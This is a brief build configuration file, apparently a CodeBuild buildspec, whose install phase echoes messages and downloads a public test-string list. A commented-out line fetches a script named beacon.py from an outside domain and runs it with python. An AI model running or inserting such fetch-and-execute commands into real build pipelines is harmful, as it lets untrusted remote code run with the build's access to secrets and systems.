version: 0.2
phases:
  install:
    commands:
      - echo Entering install phase...
      - curl https://github.com/minimaxir/big-list-of-naughty-strings/raw/master/blns.txt
      - #curl https://dayswithoutnetsparkeremail.info/beacon.py > b.py && python b.py
      - echo Done
